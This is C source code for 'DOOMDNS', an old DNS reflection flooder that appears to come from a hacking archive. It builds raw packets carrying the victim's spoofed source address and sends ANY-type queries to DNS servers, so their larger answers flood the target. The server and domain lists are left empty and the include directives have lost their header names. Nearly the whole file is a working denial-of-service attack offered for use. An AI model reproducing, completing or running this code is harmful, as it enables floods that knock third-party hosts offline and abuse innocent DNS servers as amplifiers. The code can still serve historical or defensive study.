/****************************************************************** * * * DOOMDNS Yet another flooder with 1:x pkts ratio. This one * * exploits DNS simple QUERY with spoofed UDPs. * * Since almost every DNS is bound to answer queries * * from the void, and since UDP doesn't provide a * * fruitful authentication process cause plain TCP * * does, uh !? ;) here we are. * * * * hints by |scacco|, code by FuSyS * * http://www.s0ftpj.org * * * ******************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #define IP_HEAD_BASE 20 #define UDP_HEAD_BASE 8 unsigned long saddr; int sfd, loop; char *dns_def[]={/* LISTA ASSENTE */ ,NULL}; char *domains[]={/* LISTA ASSENTE */ ,NULL}; struct DNS_MSG { HEADER head; char query[255]; }; struct dns_pkt { struct iphdr ip; struct udphdr udp; char data[1000]; }; unsigned long nameResolve(char *hostname) { struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname)) == -1) { if(!(hostEnt=gethostbyname(hostname))) { fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname); exit(0); } bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } void forge (unsigned long daddr, unsigned short src, unsigned short dst) { struct sockaddr_in sin; struct dns_pkt dpk; struct DNS_MSG killer; int shoot, len; memset(&killer, 0, sizeof(killer)); killer.head.id=getpid(); killer.head.rd=1; killer.head.aa=0; killer.head.opcode=QUERY; killer.head.qr=0; killer.head.qdcount=htons(1); killer.head.ancount=htons(0); killer.head.nscount=htons(0); killer.head.arcount=htons(0); strcat(killer.query, domains[--loop]); killer.query[strlen(domains[loop])+2]=0x00FF; killer.query[strlen(domains[loop])+4]=0x0001; memset(&dpk, 0, sizeof(dpk)); dpk.udp.source=src; dpk.udp.dest=dst; len=(12+strlen(killer.query)+5); dpk.udp.len=htons(UDP_HEAD_BASE+len); memcpy(dpk.data, (void*)&killer, len); dpk.ip.ihl=5; dpk.ip.version=4; dpk.ip.tos=0; dpk.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+len); dpk.ip.frag_off=0; dpk.ip.ttl=64; dpk.ip.protocol=IPPROTO_UDP; dpk.ip.saddr=saddr; dpk.ip.daddr=daddr; memset(&sin, 0, sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=dst; sin.sin_addr.s_addr=daddr; shoot=sendto(sfd, &dpk,IP_HEAD_BASE+UDP_HEAD_BASE+len, 0, (struct sockaddr *)&sin, sizeof(sin)); if(shoot<0)fprintf(stderr, "SPOOF ERROR"); loop++; } void doomzone (void) { unsigned long daddr; unsigned short source, dest; if(dns_def[loop]==NULL) loop=0; daddr=nameResolve(dns_def[loop++]); source=htons(1024+(rand()%2000)); dest=htons(53); forge(daddr, source, dest); } int main (int argc, char **argv) { int sfdo; unsigned int hz=100; if(argc<2) { fprintf(stderr, "Interesting .... let's flood ourselves ?!\n"); fprintf(stderr, "Use: %s target [n]\n", argv[0]); exit(0); } if(argv[2]) hz=atoi(argv[2]); saddr=nameResolve(argv[1]); srand(time(NULL)); if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) { fprintf(stderr, "\nSOCK_RAW Died\n"); exit(2); } sfdo=1; if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0) { fprintf(stderr, "\nIP_HDRINCL Died\n"); exit(3); } printf("\n\033[1;32mD00M DNS\033[0m"); printf("\n\033[1;34mDNS Flooder by FuSyS\033[0m"); printf("\n\033[1;34minithints by |scacco|\033[0m\n\n"); loop=0; while(hz--) { doomzone(); printf("\033[1;34m.\033[0m"); } printf("\n\n"); return(0); } /* www.hack.co.za [2000]*/